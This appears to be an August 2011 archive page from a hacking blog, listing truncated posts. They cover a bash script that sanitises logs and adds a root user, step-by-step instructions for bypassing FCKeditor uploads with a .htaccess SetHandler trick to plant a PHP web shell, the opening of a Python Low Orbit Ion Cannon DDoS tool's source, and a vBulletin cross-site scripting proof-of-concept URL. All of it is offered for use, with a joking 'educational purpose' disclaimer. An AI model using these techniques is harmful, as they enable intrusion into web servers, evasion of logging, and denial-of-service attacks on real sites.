Bash script sanitizes logs, adds a root user, and allows for package installation including hashcat, nmap, and more. [cc lang=”bash”]#!/bin/bash #Coded By Codeine #Visit http://infosecforums.com For Updates #Or If You Have Input #Original Test...
Monthly Archive: August 2011
Bypass all versions FCKeditor with htaccess and gain shell
Bypass all versions FCKeditor with htaccess 1.create a htaccess file (.htaccess): [cc lang=”php”] SetHandler application/x-httpd-php [/cc] 2.Now upload this htaccess with FCKeditor. [cc lang=”html”]http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/t est.html[/cc] 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif,...
Python Low Orbit Ion Cannon released – PythonLOIC – source
Python low orbit ion cannon Here it is: [cc lang=”python”] # -*- coding: cp1252 -*- import time import os from ftplib import * import urllib.request import socket import re liste=[‘whoami’, ‘whois’, ‘ping’, ‘ddos’, ‘help’,...
vBulletin Cross Site Scripting Vulnerability
Vulnerable versions: 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1 PoC: [cc lang=”html”]http://www.example.com/forums/admincp/?”;>[/cc] Happy educational purpose testing! 🙂